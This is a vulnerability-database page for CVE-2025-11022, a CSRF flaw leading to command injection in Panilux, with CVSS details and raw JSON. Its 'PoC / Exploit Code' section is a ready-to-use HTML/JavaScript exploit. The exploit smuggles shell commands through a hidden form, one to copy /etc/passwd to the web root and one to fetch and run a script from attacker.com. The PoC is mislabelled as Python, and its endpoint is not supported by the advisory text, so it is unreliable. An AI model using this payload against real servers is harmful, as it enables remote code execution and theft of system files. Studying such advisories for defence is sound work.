Security Vulnerability Report
中文
CVE-2025-11022 CVSS 9.6 CRITICAL

CVE-2025-11022

Published: 2025-12-09 16:17:34
Last Modified: 2026-04-15 00:35:42

Description

Cross-Site Request Forgery (CSRF) vulnerability in Personal Project Panilux allows Cross Site Request Forgery.  This CSRF vulnerability resulting in Command Injection has been identified. This issue affects Panilux: before v.0.10.0. NOTE: The vendor was contacted and responded that they deny ownership of the mentioned product.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Panilux < v0.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-11022 - Panilux Command Injection --> <!-- This PoC demonstrates how an attacker can exploit CSRF to trigger command injection --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-11022</title> </head> <body> <h2>CVE-2025-11022 CSRF Command Injection PoC</h2> <p>Click the button below to execute the attack (for authorized testing only)</p> <!-- Form that automatically submits via JavaScript --> <form id="attackForm" action="http://target-ip:port/panilux/admin/exec" method="POST" style="display:none;"> <!-- CSRF vulnerability: No CSRF token validation --> <input type="hidden" name="command" value="; cat /etc/passwd > /var/www/html/pwned.txt"> <input type="hidden" name="execute" value="1"> </form> <button onclick="document.getElementById('attackForm').submit();">Execute Attack</button> <script> // Auto-submit on page load (uncomment for automatic attack) // window.onload = function() { document.getElementById('attackForm').submit(); }; // Alternative: Send via fetch API async function exploitCSRF() { const targetUrl = 'http://target-ip:port/panilux/admin/exec'; const maliciousCommand = '; wget http://attacker.com/shell.sh -O /tmp/shell.sh && bash /tmp/shell.sh'; const formData = new FormData(); formData.append('command', maliciousCommand); formData.append('execute', '1'); try { const response = await fetch(targetUrl, { method: 'POST', body: formData, credentials: 'include' // Include cookies for authenticated session }); console.log('Attack sent successfully'); } catch (error) { console.error('Attack failed:', error); } } </script> <p><strong>Note:</strong> Replace 'target-ip:port' with the actual target server address.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11022", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:33.537", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Personal Project Panilux allows Cross Site Request Forgery. \n\nThis \n\nCSRF vulnerability resulting in Command Injection has been identified.\n\n\n\nThis issue affects Panilux: before v.0.10.0. NOTE: The vendor was contacted and responded that they deny ownership of the mentioned product."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0433", "source": "[email protected]"}]}}